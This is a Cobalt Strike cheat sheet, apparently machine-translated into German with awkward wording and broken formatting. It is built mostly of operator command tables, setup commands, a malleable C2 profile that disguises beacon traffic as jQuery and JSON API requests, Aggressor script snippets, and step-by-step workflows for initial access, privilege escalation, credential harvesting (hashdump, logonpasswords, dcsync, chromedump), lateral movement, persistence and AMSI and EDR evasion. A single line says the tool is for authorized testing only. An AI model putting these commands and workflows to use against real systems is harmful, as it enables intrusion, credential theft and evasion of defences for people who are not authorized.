Zum Inhalt

Cobalt Strike Cheat Sheet

generieren

Überblick

Cobalt Strike ist eine kommerzielle Penetrationstests und rote Team-Operationsplattform, um fortgeschrittene Bedrohungsakteure zu emulieren. Es bietet einen Rahmen für die Nachbenutzung, der es den Betreibern ermöglicht, Beacons (Agenten) auf kompromittierten Systemen zu implementieren, Befehl und Kontrolle (C2) Kanäle zu erstellen und verschiedene Offensive-Sicherheitsoperationen durchzuführen.

ZEIT Warning: Cobalt Strike ist ein kommerzielles Sicherheitstest-Tool, das nur in Umgebungen verwendet werden sollte, in denen Sie eine ausdrückliche Erlaubnis dazu haben.

Kernkomponenten

Team Server

  • Zentraler Befehls- und Steuerserver
  • Runs auf Linux
  • Verwalten von Leuchtfeuern und Hörern
  • Bietet Zusammenarbeit für Team-Operationen

Auftraggeber

  • Java-basierte GUI Anwendung
  • Kontakte zu Team Server
  • Schnittstelle für Betreiber, die mit Leuchtfeuern interagieren
  • Zielnetzwerke visualisieren

Leuchtfeuer

  • Primäre Nutzlast für die Nachbenutzung
  • Kommunikation mit Team Server
  • Bietet verschiedene Fähigkeiten für Offensive-Operationen
  • Kann in verschiedenen Kommunikationsmodi arbeiten

Einrichtung und Konfiguration

Team Server Setup

# Start the Team Server
./teamserver <ip_address> <password> [malleable_c2_profile]

# Example
./teamserver 192.168.1.100 P@ssw0rd! c2-profiles/normal/amazon.profile
```_

### Client Setup
  1. Launch the Cobalt Strike client
  2. Connect > New Connection
  3. Enter Team Server details:
    • Host:
    • Port: 50050 (default)
    • User:
    • Password:
  4. Verify SSL certificate fingerprint

## Hörer

### Hörer erstellen
  1. Cobalt Strike > Listeners
  2. Click "Add"
  3. Configure listener settings:
    • Name:
    • Payload:
    • Host:
    • Port:
    • Profile:
  4. Click "Save"

### Hörertypen

|  | Type | Description |  |
| --- | --- |
|  | HTTP | Uses HTTP for C2 communication |  |
|  | HTTPS | Uses HTTPS for C2 communication |  |
|  | DNS | Uses DNS queries for stealthy C2 |  |
|  | SMB | Uses named pipes for peer-to-peer C2 |  |
|  | TCP | Uses direct TCP connections |  |
|  | Foreign | Integrates with other C2 frameworks |  |

## Nutzlasterzeugung

### Beacon Payload-Typen

Attacks > Packages > 


|  | Payload Type | Description |  |
| --- | --- |
|  | Windows Executable | Standard .exe file |  |
|  | Windows Service EXE | Service executable |  |
|  | DLL | Dynamic Link Library |  |
|  | PowerShell | PowerShell one-liner |  |
|  | Python | Python script |  |
|  | Office Macro | Macro for Office documents |  |
|  | Shellcode | Raw shellcode |  |

### Artefakte

Attacks > Packages > Windows Executable (S)

- Erzeugt individuelle Nutzlasten mit Evasionstechniken
- Ändert Signaturen, um eine Erkennung zu vermeiden
- Anpassbare Vorlagen

## Beacon Commands

### Sitzungsmanagement

|  | Command | Description |  |
| --- | --- |
|  | `help` | Display help information |  |
|  | `sleep [seconds] [jitter%]` | Set sleep time and jitter |  |
|  | `checkin` | Force immediate check-in |  |
|  | `exit` | Terminate the beacon session |  |
|  | `clear` | Clear the beacon's task queue |  |
|  | `jobs` | List running jobs |  |
|  | `jobkill [JID]` | Kill a running job |  |
|  | `mode dns` | Switch to DNS mode |  |
|  | `mode dns-txt` | Switch to DNS-TXT mode |  |
|  | `mode dns6` | Switch to DNS6 mode |  |
|  | `mode http` | Switch to HTTP mode |  |
|  | `mode smb` | Switch to SMB mode |  |

### Informationen sammeln

|  | Command | Description |  |
| --- | --- |
|  | `hostname` | Get the hostname |  |
|  | `ipconfig` | Display network configuration |  |
|  | `netstat` | Display network connections |  |
|  | `ps` | List running processes |  |
|  | `tasklist` | Alternative to ps |  |
|  | `getuid` | Get current user ID |  |
|  | `whoami` | Get detailed user information |  |
|  | `pwd` | Print working directory |  |
|  | `drives` | List available drives |  |
|  | `dir [directory]` | List files in directory |  |
|  | `ls [directory]` | Alternative to dir |  |
|  | `net [command]` | Execute net command |  |
|  | `reg query [path]` | Query registry |  |
|  | `sysinfo` | Get system information |  |

### Dateioperationen

|  | Command | Description |  |
| --- | --- |
|  | `cd [directory]` | Change directory |  |
|  | `cp [source] [destination]` | Copy a file |  |
|  | `mkdir [directory]` | Create a directory |  |
|  | `mv [source] [destination]` | Move or rename a file |  |
|  | `rm [file]` | Delete a file |  |
|  | `rmdir [directory]` | Delete a directory |  |
|  | `cat [file]` | Display file contents |  |
|  | `download [file]` | Download a file from target |  |
|  | `upload [file]` | Upload a file to target |  |
|  | `timestomp [file] [template]` | Modify file timestamps |  |
|  | `ls-acl [file]` | List file permissions |  |

### Prozessabläufe

|  | Command | Description |  |
| --- | --- |
|  | `execute [program]` | Execute without capturing output |  |
|  | `shell [command]` | Execute and capture output |  |
|  | `run [program]` | Execute a program |  |
|  | `runas [user] [password] [program]` | Execute as another user |  |
|  | `pth [user] [domain] [hash]` | Pass-the-hash to create a token |  |
|  | `steal_token [pid]` | Steal token from process |  |
|  | `make_token [domain] [user] [password]` | Create a token |  |
|  | `rev2self` | Revert to original token |  |
|  | `getprivs` | Enable system privileges |  |
|  | `getsystem` | Attempt to get SYSTEM privileges |  |
|  | `execute-assembly [file.exe]` | Execute .NET assembly in memory |  |
|  | `powerpick [command]` | Execute PowerShell without powershell.exe |  |
|  | `powershell [command]` | Execute PowerShell command |  |
|  | `psinject [pid] [command]` | Execute PowerShell in specific process |  |
|  | `shinject [pid] [arch] [file.bin]` | Inject shellcode into process |  |
|  | `dllinject [pid] [file.dll]` | Inject DLL into process |  |
|  | `dllload [file.dll]` | Load DLL in beacon process |  |

### Spätere Bewegung

|  | Command | Description |  |
| --- | --- |
|  | `psexec [target] [listener]` | Use PsExec to deploy beacon |  |
|  | `psexec_psh [target] [listener]` | Use PsExec with PowerShell |  |
|  | `winrm [target] [listener]` | Use WinRM to deploy beacon |  |
|  | `wmi [target] [listener]` | Use WMI to deploy beacon |  |
|  | `ssh [target:port] [user] [pass] [listener]` | Use SSH to deploy beacon |  |
|  | `ssh-key [target:port] [user] [key] [listener]` | Use SSH with key authentication |  |
|  | `dcsync [domain] [user]` | Use DCSync to extract password hashes |  |
|  | `jump [method] [target] [listener]` | Jump to target using specified method |  |
|  | `remote-exec [method] [target] [command]` | Execute command on remote system |  |

### Pivot

|  | Command | Description |  |
| --- | --- |
|  | `rportfwd [bind port] [forward host] [forward port]` | Set up reverse port forward |  |
|  | `rportfwd stop [bind port]` | Stop reverse port forward |  |
|  | `socks [port]` | Start SOCKS proxy server |  |
|  | `socks stop` | Stop SOCKS proxy server |  |
|  | `spunnel [host] [port]` | Create encrypted tunnel over SMB |  |
|  | `spunnel stop` | Stop encrypted tunnel |  |
|  | `covertvpn [interface] [IP/Mask]` | Deploy Covert VPN interface |  |
|  | `covertvpn stop` | Stop Covert VPN |  |
|  | `pivot [host] [port]` | List pivot listeners |  |
|  | `pivotlistener [host] [port]` | Create pivot listener |  |

### Post-Exploitation

|  | Command | Description |  |
| --- | --- |
|  | `mimikatz [command]` | Execute Mimikatz command |  |
|  | `hashdump` | Dump password hashes |  |
|  | `logonpasswords` | Dump credentials from memory |  |
|  | `keylogger [pid]` | Start keylogger |  |
|  | `screenshot [pid]` | Take screenshot |  |
|  | `screenwatch [pid]` | Watch target's screen |  |
|  | `printscreen` | Take screenshot using PrintScreen |  |
|  | `reg query [path]` | Query registry |  |
|  | `powerview [command]` | Execute PowerView command |  |
|  | `portscan [targets] [ports] [discovery method]` | Scan for open ports |  |
|  | `browserpivot [pid] [port]` | Hijack authenticated web sessions |  |
|  | `chromedump` | Dump Chrome cookies and login data |  |
|  | `persist [method] [listener]` | Set up persistence |  |
|  | `elevate [exploit] [listener]` | Attempt privilege escalation |  |

## Malleable C2 Profile

### Grundstruktur

Global options

set sleeptime "5000"; set jitter "10"; set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36";

HTTP staging

http-stager \\{ set uri "/jquery-3.3.1.min.js"; client \\{ header "Accept" "text/javascript, application/javascript, /"; \\} server \\{ header "Content-Type" "application/javascript"; \\} \\}

HTTP client

http-get \\{ set uri "/api/v1/data"; client \\{ header "Accept" "application/json"; metadata \\{ base64; prepend "session="; append ";"; header "Cookie"; \\} \\} server \\{ header "Content-Type" "application/json"; output \\{ json \\{ "status" "success"; "data" ""; \\} prepend "\\{\"data\":\""; append "\"\\}"; base64; \\} \\} \\}


### Prüfprofile
```bash
# Verify profile syntax
./c2lint c2-profiles/normal/amazon.profile

# Start Team Server with profile
./teamserver 192.168.1.100 P@ssw0rd! c2-profiles/normal/amazon.profile
```_

## Aggressor Scripts

### Grundlegende Schriftstruktur

Event handlers

on beacon_initial \\{ println("New beacon: " . $1); \\}

Aliases (custom commands)

alias hello \\{ blog($1, "Hello, World!"); \\}

Menus

popup beacon_bottom \\{ item "Custom Command" \\{ blog($1, "Executing custom command..."); bshell($1, "whoami"); \\} \\}

Functions

sub get_system_info \\{ bshell($1, "systeminfo"); \\}


### Gemeinsame Skriptfunktionen

|  | Function | Description |  |
| --- | --- |
|  | `blog($1, "message")` | Write to beacon console |  |
|  | `bshell($1, "command")` | Execute shell command |  |
|  | `bpowershell($1, "command")` | Execute PowerShell command |  |
|  | `bpowerpick($1, "command")` | Execute PowerShell without powershell.exe |  |
|  | `bexecute_assembly($1, "/path/to/file.exe")` | Execute .NET assembly |  |
|  | `bdllspawn($1, "/path/to/file.dll")` | Inject Reflective DLL |  |
|  | `bpsexec($1, "target", "listener")` | Execute PsExec lateral movement |  |
|  | `bwmi($1, "target", "listener")` | Execute WMI lateral movement |  |
|  | `bwinrm($1, "target", "listener")` | Execute WinRM lateral movement |  |

## OPSK Erwägungen

### Prozessinjektion

Set parent process for new processes

ppid [pid]

Set process to spawn for post-ex jobs

spawnto x64 %windir%\sysnative\rundll32.exe spawnto x86 %windir%\syswow64\rundll32.exe

Mask command-line arguments

argue [command] [fake arguments]

Block non-Microsoft DLLs

blockdlls start blockdlls stop


### Evasion Techniken

Obfuscate beacon in memory

sleep_mask [seconds] [jitter%]

Configure staging process

stage \\{ set obfuscate "true"; set stomppe "true"; set cleanup "true"; \\}

Disable AMSI

amsi_disable

Use smarter process injection

smartinject


## Gemeinsame Workflows

### Erster Zugang
  1. Create a listener (Cobalt Strike > Listeners)
  2. Generate a payload (Attacks > Packages)
  3. Deliver payload to target
  4. Wait for beacon check-in

### Vorrechte Eskalation
  1. Check current privileges: getuid
  2. Attempt to get SYSTEM: getsystem
  3. If unsuccessful, try specific exploits: elevate [exploit] [listener]
  4. Verify new privileges: getuid

### Credential Harvesting
  1. Dump hashes: hashdump
  2. Dump credentials from memory: logonpasswords
  3. Use Mimikatz for advanced options: mimikatz [command]
  4. Extract domain hashes (if DC): dcsync [domain] [user]

### Spätere Bewegung
  1. Identify targets: net view
  2. Choose lateral movement technique:
    • psexec [target] [listener]
    • winrm [target] [listener]
    • wmi [target] [listener]
  3. Verify new beacon check-in

### Persistenz
  1. Choose persistence method:
    • persist [method] [listener]
    • schtasks [options]
    • service [options]
    • registry [options]
  2. Verify persistence works
  3. Document persistence mechanisms for cleanup ```_

Ressourcen